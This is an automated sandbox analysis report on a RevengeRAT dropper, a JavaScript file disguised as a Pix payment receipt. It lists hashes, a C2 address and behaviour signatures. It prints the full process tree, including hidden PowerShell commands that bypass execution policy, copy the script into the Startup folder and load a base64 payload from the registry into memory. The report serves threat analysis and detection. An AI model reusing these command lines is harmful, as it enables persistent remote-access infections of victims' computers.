Analysis

  • max time kernel
    120s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-09-2024 20:26

General

  • Target

    XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js

  • Size

    119KB

  • MD5

    5f05f5c7e4e19da45e124065d6f5fd1e

  • SHA1

    12be89e5beb8ad794235f16bf29dc36a56d012af

  • SHA256

    6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22

  • SHA512

    2776bd209d50a93a17077c958f31378c1972b054e6aa42a398fc1a9a1f5c69bd8b79d04fd46a07b1b65996c2b6bf6c3032c95e09009655532e62e6540403d5a6

  • SSDEEP

    1536:0+fUYZPT8sYJHkWF5qBKoy1XtczvzYFNW+Nn:nfLasWHtuY1XtcbsFNW+Nn

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

18.231.150.177:5222

Mutex

282ac7d305

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js'));wscript 'C:\Users\Admin\AppData\Roaming\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2284
      • C:\Windows\system32\wscript.exe
        "C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Roaming\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2076
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js'))"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mastercoca').mastercoca;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:376

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    6607906094c7939e3ca723d035d00531

    SHA1

    c38ad2bdfdae8c4e051340b50b6e8e14d4a82923

    SHA256

    9f5d5fdf6701803c840a0760e04714826cfd0bfc24004358e9129dcbb1fafbb7

    SHA512

    a1c26a7cd1ff67117da6ee202abcbb4a79ae5b839988043a2fd3e68457deb506fdec1ee19e67b419d502b1ee537cb9e14c8aabc37b48512f70975484e308b35b

  • C:\Users\Admin\AppData\Roaming\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js

    Filesize

    59KB

    MD5

    e9dd8e7412f2f40bf00bbb0e40055a40

    SHA1

    718625814199c7b89012f21564c46298c72ba698

    SHA256

    fa317dc427e8220fb94c7cad40a0f513462d46851477b4c1cdef7bc49eb9a7e2

    SHA512

    c0501746cd0bd537dc7ae13b8e34c543c84eeb84b34ae6f4c49f8b4d395becd4595e0dad95c0f24631cb8a29232d0f1a4047ede54a49b5213ecaba4d6224728e

  • memory/376-21-0x0000000002BF0000-0x0000000002BFA000-memory.dmp

    Filesize

    40KB

  • memory/2284-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

    Filesize

    4KB

  • memory/2284-5-0x000000001B7A0000-0x000000001BA82000-memory.dmp

    Filesize

    2.9MB

  • memory/2284-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

  • memory/2284-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2284-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2284-23-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2284-24-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

    Filesize

    4KB